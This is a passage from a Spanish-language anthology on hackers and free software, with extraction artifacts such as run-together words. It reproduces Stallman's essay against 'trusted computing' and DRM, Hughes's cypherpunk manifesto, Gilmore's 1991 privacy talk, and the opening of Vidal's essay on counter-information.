Copyright 2001 RichardStallman. La reproducciónliteral y la redistribuciónde este artículo en sutotalidad se permiten paracualquier medio en tanto semantenga esta nota y la notade copyright.

Page 257: Internet, hackers y software li   varios

¿Puede confiar en sucomputadora?

¿De quién debería recibir órdenes sucomputadora? Mucha gente piensa quesus computadoras deberían obedecerlesa ellos, en vez de a otras personas.Mediante un plan al que llamancomputación confiable [trustedcomputing], grandes corporaciones delos medios de comunicación (incluyendolas compañías cinematográficas y de laindustria discográfica) junto concompañías de informática tales comoMicrosoft e Intel, están planificando

Page 258: Internet, hackers y software li   varios

hacer que su computadora los obedezcaa ellos en vez de a usted. (La versión deMicrosoft de este esquema se llamaPalladium). Los programas propietarios[proprietary programs] han incluidocaracterísticas maliciosas en el pasado,pero este plan haría esto universal.

Software propietario [proprietarysoftware] significa, fundamentalmente,que usted no controla lo que hace; nopuede estudiar el código fuente omodificarlo. No es sorprendente quehábiles hombres de negocios encuentrenformas de usar su control para ponerle austed en desventaja. Microsoft ha hechoesto varias veces; una versión de

Page 259: Internet, hackers y software li   varios

Windows fue diseñada para reportar aMicrosoft todo el software en su discoduro; una reciente actualización deseguridad en el ReproductorMultimedia de Windows requería quelos usuarios aceptaran nuevasrestricciones. Pero Microsoft no estásolo: el software para intercambio demúsica KaZaa está diseñado de formaque un asociado de negocios de KaZaapueda alquilar el uso de su computadoraa sus clientes. Estas característicasmaliciosas son normalmente secretas,pero una vez que usted se entera de ellases difícil eliminarlas, dado que nodispone del código fuente.

Page 260: Internet, hackers y software li   varios

En el pasado, estos fueron incidentesaislados. Computación confiable losharía omnipresentes. Computacióntraidora es un nombre más apropiado,porque el plan está diseñado paraasegurarse de que su computadorasistemáticamente lo desobedecerá. Dehecho, está diseña do para que la mismadeje de funcionar como unacomputadora de propósito general. Cadaoperación puede requerir de unaautorización explícita.

La idea técnica detrás de lacomputación traidora es que lacomputadora incluye un dispositivo decifrado y firma digital, y las claves se

Page 261: Internet, hackers y software li   varios

mantienen secretas para usted. Losprogramas propietarios usan estedispositivo para controlar qué otrosprogramas puede ejecutar, a quédocumentos o datos puede acceder y aqué programas se los puede transferir.Esos programas continuamentedescargarán nuevas reglas deautorización a través de Internet, eimpondrán dichas reglasautomáticamente a su trabajo. Si ustedno permite a su computadora obtener lasnuevas reglas periódicamente deInternet, algunas capacidades dejaránautomáticamente de funcionar.

Por supuesto, Hollywood y las

Page 262: Internet, hackers y software li   varios

compañías discográficas planean usar lacomputación traidora para DRM(Administración de RestriccionesDigitales [Digital RestrictionManagement]), así los vídeos y lamúsica descargados podrán serreproducidos sólo en una computadoraespecífica. Compartir serácompletamente imposible, al menosusando los archivos autorizados quedeberá obtener de dichas compañías.Usted, el público, debería tener lalibertad y la habilidad de compartir esascosas. (Espero que alguien encuentre laforma de producir versiones no cifradas,y de subirlas y compartirlas, así DRM

Page 263: Internet, hackers y software li   varios

no tendrá éxito completamente, pero estono es excusa para el sistema).

Hacer imposible el compartir ya eslo suficientemente malo, pero se ponepeor. Existen planes para usar la mismafacilidad al enviar documentos porcorreo electrónico, resultando enmensajes que desaparecen en dossemanas, o documentos que sólo puedenser leídos en las computadoras dedeterminada compañía.

Imagínese si usted recibiera unmensaje de correo electrónico de su jefediciéndole que haga algo que ustedpiensa que es arriesgado; un mesdespués, cuando el tiro sale por la culata

Page 264: Internet, hackers y software li   varios

no puede usar el mensaje para mostrarque la decisión no fue suya. Ponerlo porescrito no lo protege si la orden estáescrita en tinta que desaparece.

Imagínese si usted recibe un mensajede correo electrónico de su jefeestableciendo una política que es ilegalo inmoral, tal como destrozar losdocumentos de auditoría de sucompañía, o permitir que una amenazapeligrosa para su país avance sin sercontrolada. Actualmente, usted puedeenviar esto a un periodista y exponer laactividad. Con la computación traidora,el periodista no será capaz de leer eldocumento; su computadora se negará a

Page 265: Internet, hackers y software li   varios

obedecerlo. La computación traidora setransforma en un paraíso para lacorrupción.

Los procesadores de texto talescomo Microsoft Word podrían usar lacomputación traidora cuando ustedguarde sus documentos, para asegurarsede que ningún procesador de texto de lacompetencia podrá leerlos. Actualmentedebemos averiguar los secretos delformato de Word mediante laboriososexperimentos, para que los procesadoreslibres puedan leer documentos de Word.Si Word cifra los documentos usandocomputación traidora cuando los guarda,la comunidad del software libre no

Page 266: Internet, hackers y software li   varios

tendrá la posibilidad de desarrollarsoftware para leerlos, y si pudiéramos,tales programas podrían ser prohibidospor la Digital Millennium Copyright Act[Ley de Copyright del Milenio Digital].

Los programas que usencomputación traidora continuamentedescargarán nuevas reglas deautorización desde Internet, e impondrándichas reglas a su trabajo. Si aMicrosoft, o al gobierno de los EE.UU,no le agrada lo que usted dice en undocumento que escribió, podránpublicar nuevas restricciones diciendo atodas las computadoras que se rehúsen adejar que alguien lea dicho documento.

Page 267: Internet, hackers y software li   varios

Cada computadora del mundo obedecerácuando descargue las nuevasinstrucciones. Su escrito estará sujeto aun borrado retroactivo estilo 1984.Hasta usted podría ser incapaz de leerlo.

Podría pensar que usted puedeaveriguar qué cosas sucias hace unaaplicación de computación traidora,estudiar qué tan dañinas son, y decidir siaceptarlas. Sería ingenuo aceptarlo,pero el punto es que el trato que creeque está haciendo no se mantendrá. Unavez que usted dependa del uso delrograma, estará enganchado y ellos losaben; entonces pueden cambiar el trato.Algunas aplicaciones automáticamente

Page 268: Internet, hackers y software li   varios

bajarán actualizaciones que harán algodiferente, y no le darán la posibilidad deelegir si desea la actualización o no.

Actualmente puede evitar serrestringido por el software propietariono usándolo. Si ejecuta GNU/Linux uotro sistema operativo libre, y si evitainstalar aplicaciones propietarias sobreél, entonces usted está al mando de loque su computadora hace. Si unprograma libre tiene una característicamaliciosa, otros desarrolladores en lacomunidad la quitarán y usted puedeusar la versión corregida. Puede tambiénejecutar aplicaciones y herramientaslibres en sistemas operativos no libres;

Page 269: Internet, hackers y software li   varios

esto falla completamente en darlelibertad, pero muchos usuarios lo hacen.

La computación traidora pone enpeligro la existencia de sistemasoperativos y aplicaciones libres, porqueusted ya no podrá ejecutarlas. Algunasversiones de la computación traidorarequerirán que el sistema operativo estéespecíficamente autorizado por unacompañía particular. Los sistemasoperativos libres no podrán serinstalados. Algunas versiones de lacomputación traidora requerirán quecada programa sea específicamenteautorizado por el desarrollador delsistema operativo. No podrá ejecutar

Page 270: Internet, hackers y software li   varios

aplicaciones libres en tales sistemas. Siusted averigua cómo hacerlo y se lo dicea alguien, eso podría constituir un delito.

Existen proyectos de ley en EE.UUque requieren que todas lascomputadoras soporten computacióntraidora, y que se prohíba la conexión decomputadoras antiguas a Internet. LaCBDTPA (la llamamos Ley ConsumaPero No Trate de Programar [ConsumeBut Don’t Try Programming Act]) es unode ellos. Pero inclusive si no lo fuerzanlegalmente a migrar hacia lacomputación traidora, la presión paraaceptarla puede ser enorme.Actualmente las personas usualmente

Page 271: Internet, hackers y software li   varios

utilizan el formato Word paracomunicarse, aunque esto causa variostipos de problemas (vea We Can Put anEnd to Word Attachments [60 ]). Sisolamente una máquina de computacióntraidora puede leer los últimosdocumentos de Word, mucha gentemigrará hacia ella, si ven la situaciónsólo en términos de acción individual(tómalo o déjalo). Para oponernos a lacomputación traidora, debemos unirnosy confrontar la situación como unaelección colectiva.

Para mayor información sobrecomputación traidora, veahttp://www.cl.cam.ac.uk/users/rja14/tcpa-

Page 272: Internet, hackers y software li   varios

faq.html .[61] Bloquear la computacióntraidora requerirá que se organicen ungran número de ciudadanos.¡Necesitamos su ayuda! La ElectronicFrontier Foundation (Fundación FronteraElectrónica)[62] y Public Knowledge(Conocimiento Público)[63] estánorganizando campañas en contra de lacomputación traidora, así como tambiénel Digital Speech Project[64] (ProyectoExpresión Digital) sponsoreado por laFSF [Free Software Foundation]. Porfavor, visite estos sitios Web para podersumarse y apoyar de su trabajo.

También puede ayudar escribiendo alas oficinas de asuntos públicos de Intel,

Page 273: Internet, hackers y software li   varios

IBM, HP/Compaq, o cualquiera a quienusted le haya comprado unacomputadora, explicándole que noquiere ser presionado a comprarsistemas de computación confiable, porlo cual no está de acuerdo en que elloslos produzcan. Esto puede ejercer lapresión del poder del consumidor. Siusted hace esto, por favor envíe copiasde sus cartas a las organizaciones antescitadas.

Copyright 2002 RichardStallman. Está permitida ladistribución y copia literalde este artículo completo encualquier medio, siempre que

Page 274: Internet, hackers y software li   varios

se preserve esta nota.

Page 275: Internet, hackers y software li   varios

CRIPTOGRAFIA

Page 276: Internet, hackers y software li   varios

Un manifiesto cripto-hacker

Eric Hughes fundó en 1992 el grupode investigación y activismoCypherpunks (cripto-hackers), juntocon John Gilmore y Tim C. May. Elgrupo mantiene un foro de discusiónsobre técnicas de encriptación, ademásde organizar encuentros y promover eluso de programas de encriptación paragarantizar la privacidad en Internet.

Este texto de 1993 es una de lasdeclaraciones de cabecera del grupo.

En la era electrónica la privacidad

Page 277: Internet, hackers y software li   varios

es necesaria para lograr una sociedadabierta. Privacidad no es guardarsecretos. Un asunto privado es algo delo que uno no quiere que todo el mundose entere, pero un asunto secreto es algode lo que uno no quiere que nadie seentere. Privacidad es la posibilidad derevelarse uno mismo ante el mundo demanera selectiva.

Si dos partes realizan algún tipo denegociación, entonces cada una guardaun recuerdo de ese encuentro. Cadaparte puede hablar sobre lo que sabe dela otra; ¿cómo evitarlo? Se podríanhacer leyes contra esto, pero la libertadde expresión, todavía más que la

Page 278: Internet, hackers y software li   varios

privacidad, es fundamental en unasociedad abierta; no buscamos restringirninguna expresión en ningún sentido. Sivarias partes hablan juntas en el mismoforo, cada una puede hablar a todas lasdemás y aportar colectivamenteconocimiento sobre otras personas ygrupos. El poder de las comunicacioneselectrónicas hace posible este diálogogrupal, y no va a desaparecer sóloporque queramos.

Dado que queremos privacidad,debemos garantizar que cada parte deuna transacción sepa de la otra sóloaquello que es absolutamente necesariopara la transacción. Dado que cualquier

Page 279: Internet, hackers y software li   varios

información puede divulgarse, debemosasegurar que revelamos de nosotros lomenos posible. En la mayoría de loscasos la identidad no es necesaria.Cuando compro una revista en unnegocio y le pago en efectivo al cajero,no hace falta que sepa quién soy.Cuando le digo a mi proveedor decorreo electrónico que quiero enviar yrecibir mensajes, no hace falta que miproveedor sepa a quién le estoyescribiendo o qué le digo o lo que otrosme dicen a mí; mi proveedor sólo tieneque saber a dónde tiene que enviar losmensajes y cuánto le debo por elservicio. Cuando mi identidad queda al

Page 280: Internet, hackers y software li   varios

descubierto por el mismo mecanismo dela transacción, no tengo privacidad.Aquí yo no puedo descubrirme a mímismo selectivamente; yo siempre tengoque descubrirme.

Por eso, en una sociedad abierta laprivacidad requiere sistemas detransacción anónima. Hasta ahora, losbilletes fueron ese sistema. Un sistemade transacción anónima no es un sistemade transacción secreta. Un sistemaanónimo da la posibilidad a laspersonas de revelar su identidad cuandoquieren y sólo cuando quieren; esa es laesencia de la privacidad.

En una sociedad abierta la

Page 281: Internet, hackers y software li   varios

privacidad también requiere decriptografía. Si digo algo, yo quiero quelo escuchen sólo aquellos a los que estádestinado. Si el contenido de mispalabras está disponible a todo elmundo, yo no tengo privacidad.Encriptar es manifestar el deseo deprivacidad, y encriptar con criptografíadébil es manifestar poco deseo deprivacidad. Además, para revelar conseguridad la propia identidad cuando locorriente es el anonimato esimprescindible la firma criptográfica.

No podemos esperar que losgobiernos, corporaciones u otrasgrandes y difusas organizaciones nos

Page 282: Internet, hackers y software li   varios

garanticen la privacidad por sugenerosidad. A ellos les conviene poderhablar de nosotros, y debemos suponerque lo harán. Tratar de impedir quehablen es pelear con la realidad mismade la información. La información nosólo quiere ser libre, la libertad es elestado al que tiende por naturaleza. Lainformación se expande hasta llenar lossoportes disponibles. La Información esla prima más joven y resistente delRumor; la Información es más ligera depies, tiene más ojos, sabe más, yentiende menos que el Rumor.

Debemos defender nuestraprivacidad si queremos contar con ella.

Page 283: Internet, hackers y software li   varios

Debemos unirnos y crear sistemas quepermitan las transacciones anónimas.Durante siglos las personas handefendido su privacidad con murmullos,oscuridad, sobres, puertas cerradas,señas y mensajeros. Las tecnologías delpasado no permitían una privacidadsólida, pero las tecnologías electrónicassí.

Nosotros los cripto-hackersconstruimos sistemas anónimos. Estamosdefendiendo nuestra privacidad concriptografía, sistemas de correoelectrónico anónimo, con firmasdigitales y dinero electrónico.

Los cripto-hackers escribimos

Page 284: Internet, hackers y software li   varios

código. Sabemos que alguien tiene queescribir software para defender laprivacidad, y dado que no vamos a tenerprivacidad a menos que lo hagamos,nosotros vamos a escribirlo. Publicamosnuestro código para que nuestroscompañeros criptohackers puedanpracticar y jugar con él. Nuestro códigoes libre para que lo usen todos, en todoel mundo. No nos importa si vos noacordás con el software que escribimos.Sabemos que el software no puededestruirse y que un sistema distribuidoen red no puede apagarse.

Los cripto-hackers repudiamos lasregulaciones sobre la criptografía, ya

Page 285: Internet, hackers y software li   varios

que la encriptación es un actofundamentalmente privado. El acto deencriptar, de hecho, retira informaciónde la esfera pública. Hasta las leyescontra la criptografía alcanzan sólohasta el borde de una nación y dondellega el brazo de su violencia. Lacriptografía se propagaráindefectiblemente por todo el mundo, ycon ella el sistema de transaccionesanónimas que hace posible.

Para que la privacidad se extiendadebe formar parte de un contrato social.Las personas deben unirse y propagarestos sistemas. La privacidad sólo seextiende ante la cooperación de cada

Page 286: Internet, hackers y software li   varios

uno en la sociedad. Los cripto-hackersesperamos tus preguntas y propuestas, yque podamos involucrarte para que nonos traicionemos entre nosotros. Decualquier modo, no vamos a cambiar deidea porque algunos no acuerden connuestros objetivos.

Hasta entonces.

Page 287: Internet, hackers y software li   varios

Privacidad, tecnologiay sociedad abierta

John Gilmore es un programador delarga trayectoria. Participó de diversosproyectos como GNU, en favor delsoftware libre, y la ONG ElectronicFrontier Foundation (FundaciónFrontera Electrónica) que se dedica apromover las libertades civiles enInternet. También participó de losinicios de internet administrando forosde discusión en Usenet y desarrollótecnologías de servidores en la empresaSun Microsystems. Con Eric Hughes yTim C. May formaron el grupoCypherpunks (Cripto-hackers), que se

Page 288: Internet, hackers y software li   varios

dedica a promover e informar sobre eluso de criptografía para asegurar laprivacidad de las comunicaciones enInternet.

El texto es una ponencia presentadael 28 de marzo de 1991 en Burlingame,California, durante la PrimeraConferencia sobre Computadoras,Libertad y Privacidad. Fue organizadapor la EFF, y el público estuvo integradopor programadores, activistas,empresarios informáticos y miembrosde agencias de seguridad e inteligencia.

Mi intervención concierne a doséticas la defensa de una sociedad abiertay la defensa de la privacidad. Creo queestas dos éticas se relacionan entre sí, yquisiera decir algo acerca de cómo se

Page 289: Internet, hackers y software li   varios

relacionan con nuestro accionar en elmundo.

Esta sociedad fue fundada comosociedad libre y abierta. Nuestrosantepasados, nuestros padres, nuestroscompañeros, y nosotros mismos estamoshaciendo y construyendo esta sociedaden ese sentido porque creemos que esetipo de sociedad supera a las sociedadescerradas en calidad de vida, en libertady en la búsqueda de felicidad.

Pero yo veo que esta sociedad librey abierta corre el riesgo dedesintegrarse ante pequeños,inesperados cambios. Todavía es legalvivir en nuestra sociedad sin

Page 290: Internet, hackers y software li   varios

documentos pero apenas. Todavía eslegal vivir pagando en efectivo peroapenas. Todavía es legal juntarse conquienes se quiera a menos que traigan unporro, saquen fotos de chicos desnudospara su álbum privado, o trabajen convos creando un juego de rol defantasía.[65] Y creo que estasconferencias corren el riesgo de sercooptadas; nosotros nos sentamos aquí ytrabajamos y hablamos con otraspersonas y elaboramos consensos sobretemas relativamente menores, mientrasque perdemos de vista la sociedadabierta en su conjunto.

Por ejemplo nosotros tenemos el

Page 291: Internet, hackers y software li   varios

porcentaje más alto del mundo depoblación dentro de la prisión.Estábamos segundos pero el año pasadosuperamos a Sudáfrica. Estamosprimeros.

En los últimos diez años duplicamosel número de personas en las prisiones.De hecho, las celdas nuevas estánocupadas en su mayoría por personascon cargos por delitos con drogas, uncrimen sin víctimas que hasta hace nomás de veinte años se aceptaba y hastase celebraba. Ahora quisiera pedirles alos presentes en esta sala que por favorlevanten la mano si no han roto una ley,alguna ley, en el último mes. (una

Page 292: Internet, hackers y software li   varios

persona de 400 alza la mano)OK. Por favor levanten la mano: si

sus discos y backups fueran revisados,¿habría algo en ellos que no se permitetener? Por favor levanten la mano si susdiscos están limpios más manos unasveinte o treinta)

Hay algunos más.Pero no sorprende que estemos

preocupados por la privacidad, porquetodos somos infractores. Todosquebramos la ley, pero pocos somoscriminales. El problema es que con sólollamar la atención de la policía, alcanzapara arriesgar la mayor parte de lo quehacemos, porque quebramos la ley todo

Page 293: Internet, hackers y software li   varios

el tiempo, ¡y todo está montado para queeso suceda!

No culpo a los policías por esto. Ensu mayoría hacen cumplir las malasleyes que escriben los legisladores, perode hecho los legisladores tampocotienen la culpa, porque a la larga laúnica salida es educar a la poblaciónsobre los beneficios de la apertura. Yesto es algo a lo que siempre trato decontribuir, y creo que aporto algunascosas.

Pero más allá de eso, como dijo P.T. Barnum, [66] Hasta ahora nadieperdió plata subestimando lainteligencia del público americano.

Page 294: Internet, hackers y software li   varios

Mis mayores esperanzas las pongo en unenfoque muy diferente. Parafraseando aTed Nelson, probablemente no podamosdetener este elefante, pero quizáspodamos correr entre sus patas.

En la mayor parte de Europa, lascompañías de teléfonos no registran elnúmero al que uno llama, y no lomuestran en la boleta. Sólo cuentan elmonto de la llamada. Bien, me contaronque esto es en parte porque los nazisusaban los registros de llamadas queantes había, para rastrear e identificar ala oposición de los países que invadíanen la Segunda Guerra Mundial. Desdeentonces dejaron de registrar los

Page 295: Internet, hackers y software li   varios

números.En EE.UU la gente boicoteó el censo

con números de registro de 1990. Piensoque tuvo mucho que ver en esto lavergonzosa historia de cómo luego dePearl Harbour se arrió a campos deconcentración a los japoneses-americanos empleando los datos delcenso.

El profesor Lawrence Tribe hablóen este encuentro sobre la grandesconfianza que debemos tener antenuestro gobierno. Tenemos que darnoscuenta de que la gente que maneja elgobierno puede cambiar, y de hechocambia. Nuestra sociedad, y nuestras

Page 296: Internet, hackers y software li   varios

reglas permanentes, deben asumir quegente mala incluso criminal va a manejarel gobierno, al menos parte del tiempo.

Aquí se habló mucho deprivacidad… pero no nos hemosdetenido tanto en por qué la queremos.La privacidad es un medio, ¿cuál es elverdadero fin que estamos buscando?Yo propongo que lo que buscamos esmás tolerancia.

La sociedad tolera todos losdistintos tipos de comportamientodiferencias religiosas, diferencias deopiniones políticas, de raza, etc. Pero situs diferencias no son aceptadas por elgobierno o por otras partes de la

Page 297: Internet, hackers y software li   varios

sociedad, todavía podés ser tolerado sisimplemente ignoran que sos diferente.Un gobierno represivo o una personarepresiva no pueden perseguirte si te vesigual que los demás. Como dijo GeorgePerry hoy, La diversidad es laventaja comparativa de la sociedadamericana. Pienso que eso es lo queestá protegiendo realmente laprivacidad.

La conferencia dedicó mucho tiempoa hablar sobre modos de controlar losusos de la información y de proteger laprivacidad de las personas luego de quela información es recogida. Pero esofunciona sólo si se presupone un buen

Page 298: Internet, hackers y software li   varios

gobierno. Si surge un gobierno muymalo, van a tener toda la informaciónque necesiten para generar un eficienteestado policial y constituirse comoúltimo gobierno. Sería más queconveniente para ellos de hecho, es unatentación para la gente que quieraintentarlo. Porque les estamos dando losmedios.

¿Qué pasa si podemos construir unasociedad donde la información nunca serecoge?, ¿en la que podrías pagar paraalquilar un video sin dejar un número detarjeta de crédito o de cuenta de banco?,¿en la que podrías demostrar que tienespermiso para conducir sin ni siquiera

Page 299: Internet, hackers y software li   varios

dar tu nombre? ¿en la que podrías enviary recibir mensajes sin revelar tuemplazamiento físico, como una caja decorreo electrónica?

Ese es el tipo de sociedad quequiero construir. Quiero asegurar confísica y matemática, no con leyes quepodamos darnos a nosotros mismoscosas como una verdadera privacidadpara las comunicaciones personales.Una encriptación lo suficientementesólida que incluso la NSA[67] no puedaromperla. Sabemos cómo hacerlo. Perono lo ponemos en práctica. Tambiénnecesitamos mejores protocolos paraque las comunicaciones móviles no

Page 300: Internet, hackers y software li   varios

puedan rastrearse.También queremos privacidad real

para los datos de las computadoras.Nuestras computadoras son extensionesde nuestras mentes. Debemosconstruirlas de manera que unpensamiento escrito en una computadorasea tan privado como el mismopensamiento guardado en nuestrascabezas.

Debemos tener verdadera libertadde comercio. Debemos poder vender loque hacemos y comprar lo que queremosde y a cualquiera para podermantenernos y poder conseguir las cosasque queremos conseguir en este mundo.

Page 301: Internet, hackers y software li   varios

Es importante que tengamosverdadera privacidad financiera porquelos bienes y la información cuestandinero. Cuando compras o vendes o tecomunicas, va a haber dinero cambiandode manos. Si pueden rastrear el dinero,pueden rastrear el intercambio y lacomunicación, y perdemos la privacidaden torno a él.

También necesitamos verdaderocontrol de la identificación.Necesitamos la posibilidad demantenernos anónimos mientrasejercemos todos estos derechos. Demodo que incluso con nuestras fotos,nuestras huellas dactilares y nuestro

Page 302: Internet, hackers y software li   varios

perfil de ADN, no puedan vincularnuestra comunicación, compras yactividad financiera con nuestrapersona.

Ahora bien, acá no estoy hablandode no dar cuenta de las acciones, paranada. Debemos poder dar cuenta de loque hacemos a las personas con las quenos comunicamos. Debemos poder darcuenta de nosotros a la gente con la quecomerciamos. Y la tecnología debeconstruirse para permitir eso. Pero nodebemos estar exhibiéndonosautomáticamente al PÚBLICO con elque hablamos, o al que compramos ovendemos.

Page 303: Internet, hackers y software li   varios

Aquí surgen muchos problemas.Creo que tenemos que trabajar en ellos.Se deben diseñar leyes justas para esasociedad. Las personas deben poderencontrarse con otras personas afines. Yalguien tiene que pagar el costo delgobierno, incluso aunque no puedanespiar nuestros ingresos y compras. Nosé cómo resolver estos problemas, perono pienso tirar al bebé con el agua sucia.Sigo pensando que debemos apuntar auna auténtica privacidad y buscarsoluciones para estos problemas.

Entonces, ¿cómo llegamos desde acáa esta nueva sociedad? Una manera esdejar de diseñar y promover falsas

Page 304: Internet, hackers y software li   varios

protecciones, como las leyes que dicenque no se permite escuchar las llamadasde los teléfonos celulares.Definitivamente debemos dejar deconstruir sistemas manifiestamenteamenazantes como el sistema deidentificación Thai o el sistemaCalTrans de rastreo de vehículos.

Otra cosa para hacer es, si ya sabencómo, empezar a diseñar, o seguirdiseñando, protecciones verdaderaspara las cosas que fabrican. Háganlopara el mercado de EE.UU, aún si laNSA sigue prohibiendo la privacidadcon controles para la exportación decriptografía. Es más costoso diseñar dos

Page 305: Internet, hackers y software li   varios

versiones, una para nosotros y otra paraexportar, pero vos estás fabricando paratu sociedad y creo que debes fabricarpara el modo en que quieren vivir.

Si no saben cómo diseñar unaprotección real, cómprenla. Creen unmercado para los que están diseñándola,y al mismo tiempo protejan suprivacidad poniéndola en uso. Exíjanlade las personas que los proveen, comolas compañías de computadoras y losfabricantes de telefonía celular.

También hay que trabajar paraeliminar las restricciones para laexportación. Debemos poder importar lomejor desde cualquier parte y debemos

Page 306: Internet, hackers y software li   varios

poder exportar la privacidad y lo mejorde nuestros productos al resto delmundo. La NSA actualmente nos tiene derehenes; los fabricantes decomputadoras, por ejemplo, noincorporan seguridad porque no se lespermite exportarla. IBM agregó DES[68]

a su nueva línea de computadoras, y sólolo iban a hacer con los modelos dentrode EE.UU, pero la NSA los amenazócon demandarlos y limitar incluso susexportaciones comunes. IBM dio marchaatrás y se retiró. No podemos dejar queesto siga pasando.

También tenemos que educar a todossobre lo que es posible para que

Page 307: Internet, hackers y software li   varios

podamos elegir el tipo de libertad quequeremos en vez de asumir que esinalcanzable.

Por último, tenemos que asegurarque el dinero en efectivo y el anonimatosigan siendo legales. Lo vamos anecesitar como precedentes para eldinero electrónico y el anonimatocriptográfico.

Creo que con estos enfoques vamosa hacer mucho más por nuestra libertadreal, nuestra privacidad real y nuestraseguridad real, que sacando algunasleyes nuevas o asustando a algunos delos chicos que andan rompiendo lasbarreras de seguridad de la red.

Page 308: Internet, hackers y software li   varios

Podemos crear un futuro del que estemosorgullosos de habitar y felices de dejar anuestros hijos. Muchas gracias.

Page 309: Internet, hackers y software li   varios

ACTIVISMO

Page 310: Internet, hackers y software li   varios

Contra (la)informacion:

comunicación einteligencia colectiva

Miquel Vidal La siguiente es unaponencia presentada en los IVEncuentros de Contrainformación delEstado español, celebrados en abril de1999 en el centro social okupado «ElLaboratorio», en Madrid, que sirvieron,entre otras cosas, para la presentaciónpública del Proyecto sinDominio. Fuepublicado en papel por la revistamadrileña Contrapoder en ese mismo

Page 311: Internet, hackers y software li   varios

año.

«No habrá nunca una puerta. Estásadentro

y el laberinto alcanza el universoy no tiene ni anverso ni reversoni externo muro ni secreto centro».

Jorge Luis Borges

La extensión del ciberespacio[69] hapuesto muy en evidencia los límites delesquema clásico de la teoría de lainformación, en la que se establece unflujo unidireccional entre el emisor y elreceptor, a través de un canaldeterminado. Este planteamientoasimétrico es bien conocido y se trata de

Page 312: Internet, hackers y software li   varios

un elemento recurrente en todos losmedios de comunicación tradicionales:por un lado, el productor de lainformación; por otro, su [email protected] cierto que desde hace algún tiempolos medios se esfuerzan por introducircierto grado de interactividad(teletienda, pago por visión, encuestas,intervenciones telefónicas…), pero noson más que paliativos bastante burdos.La insistencia en que la gente intervenga,opine, se solidarice, etc. no puedeocultar a nadie la ausencia de unainteractividad que no existe en absoluto.

Aunque su intención sea opuesta, elesquema de la contrainformación no

Page 313: Internet, hackers y software li   varios

difiere mucho en su expresión material.Sigue habiendo un@s que producen lainformación las agencias y medioscontrainformativos con muy escasosmedios y otr@s que la reciben la peñacon más buena fe que interés. Parececlaro que no por repetir muchas vecesideas como horizontalidad o no-mediación, la comunicación quepromovemos pasará automáticamente aser horizontal o no mediada. Prácticasde la contrainformación como sacar a laluz informaciones obviadas omanipuladas por los mediosconvencionales se basan en la idea de«veracidad» o, dicho de otro modo, en

Page 314: Internet, hackers y software li   varios

la búsqueda de una aproximaciónmáxima entre los hechos y el relato quese construye. Esa noción de que hay unaverdad que hay que sacar a la luz tienesu apogeo en contextos totalitarios en elque se censura la información o bien enun esquema ilustrado de otros tiemposen el que había falta de información. Noes ese ciertamente nuestro caso, en elcual el problema es más bien elcontrario: flujo excesivo de informaciónque produce ruido, distorsión,redundancia y banalidad, pasando a serfundamental el cómo situarnos desdenuestra precariedad de medios ensemejante contexto. Aquí quizá el

Page 315: Internet, hackers y software li   varios

concepto de visibilidad adquiere toda supotencia, pero en todo caso no podemoslimitarnos a sumarnos a ese griteríoininteligible pues por muy buena que seanuestra intención y muy interesantesnuestras informaciones no tenemosforma de hablar más alto que losmedios convencionales y que se nosoiga en medio del ruido. La buenavoluntad no es suficiente. Tampoco eluso de un medio u otro garantizaautomáticamente una comunicaciónantagonista.

¿Hay pues posibilidad decomunicación alternativa, más allá decontribuir al ruido mediático? Una

Page 316: Internet, hackers y software li   varios

posible línea de fuga sería ver sipodemos convertir la comunicación enalgo capaz de producir formas de vida yde socialidad refractarias al mercado yal mando. Y en ese contexto, el mensajees lo de menos. Aquí, el procesocomunicativo es lo importante, pero nocualquier proceso comunicativo sino elque producimos en una apuesta colectivade lucha contra el poder (los poderes).Comunicación en proceso comocreación de nuevos espacios de libertad,con singularidades que desbordan ladisyuntiva individuo/colectivo y que sonfruto de la libre circulación de saberes yexperiencias diversas.

Page 317: Internet, hackers y software li   varios

Pero el caso es que el esquema de lacontrainformación se sigue centrando enel mensaje, en la información misma, obien en el emisor y su papel(contra)informativo. Por ejemplo cuandodecimos que queremos dar voz a l@ssin voz y cosas por el estilo. Con esto,conseguimos en el mejor de los casosmultiplicar y diversificar el número demensajes en la red, pero no por esto seestá necesariamente contrainformando.No quiero decir con esto que hacer notasde prensa o ejercer de altavoz deaquello silenciado desde otros ámbitossea inútil o contraproducente. Es más,hay muchos casos en que información

Page 318: Internet, hackers y software li   varios

veraz es sinónimo de contrainformación.A lo que voy es que debemos tratar de irmás allá de ese esquema y para elloresulta imprescindible reequilibrar loselementos discursivos unidireccionales(frases, imágenes, informaciones,páginas web…) con lo que se puededenominar elementos existenciales de lacomunicación, esto es, los elementoséticos y políticos multidireccionales.¿Qué ética, qué política? Una éticafundada en la horizontalidad de lasrelaciones entre los individuos, en lacooperación y la puesta en común desaberes y experiencias y en laposibilidad de todo el mundo de poder

Page 319: Internet, hackers y software li   varios

emitir para todo el mundo; una políticade la no dominación, de la nodependencia, de la autonomía de losindividuos y de los grupos sociales.Para ello hay que renunciardefinitivamente al esquema del humanoalienado por el Estado o adormecidopor los media y que debe sercontrainformado; la información ya estáahí, de todos los signos posibles, alalcance de tod@s: lo que propongo encambio es apostar por comunicar lacomunicación, por la inteligenciacolectiva, y por su espacio natural, elciberespacio.

Y es que mientras hemos estado

Page 320: Internet, hackers y software li   varios

discutiendo sobre si las nuevastecnologías son liberadoras o son uninstrumento más al servicio del poder,ya se nos está imponiendo una manerade hacer y la dinámica social nos hasobrepasado y ya está indagando desdehace tiempo en sus atractivos, tambiénen sus límites y peligros. Cuando estastecnologías empiezan a estar arraigadassocialmente, cuando empezamos avislumbrar la posibilidad de su usoantagonista, igual ya es demasiado tarde,ya están emergiendo otras tecnologías enla frontera nebulosa donde se inventanlas ideas, las cosas y las prácticas. Y noson empresas ni Estados sino grupos

Page 321: Internet, hackers y software li   varios

indeterminados de individuos que semueven con criterios que me atrevo acalificar de marginales y con los quetenemos mucho que ver (aunque nuncales veamos ;-). Por ejemplo, ningúnEstado, ninguna empresa, había previstoni anunciado el desarrollo de lainformática personal, ni el de lasinterfaces gráficas interactivas paratod@s, ni el de las BBS o el apoyomutuo de las comunidades virtuales, nide los hipertextos, ni de la Web, ni delos programas de criptografía personal einviolable, ni de GNU/Linux.[70] Estastecnologías, todas ellas empapadas desus primeros usos y de los proyectos de

Page 322: Internet, hackers y software li   varios

quienes las concibieron, nacidas dementes visionarias, transportadas por eltrasiego de movimientos sociales y deprácticas de base y cooperativas, hanllegado donde ningún tecnócrata podíasiquiera sospechar, pero parece quetampoco lo esperaban los medios decomunicación, incluyendo aquí a loscolectivos de contrainformación.

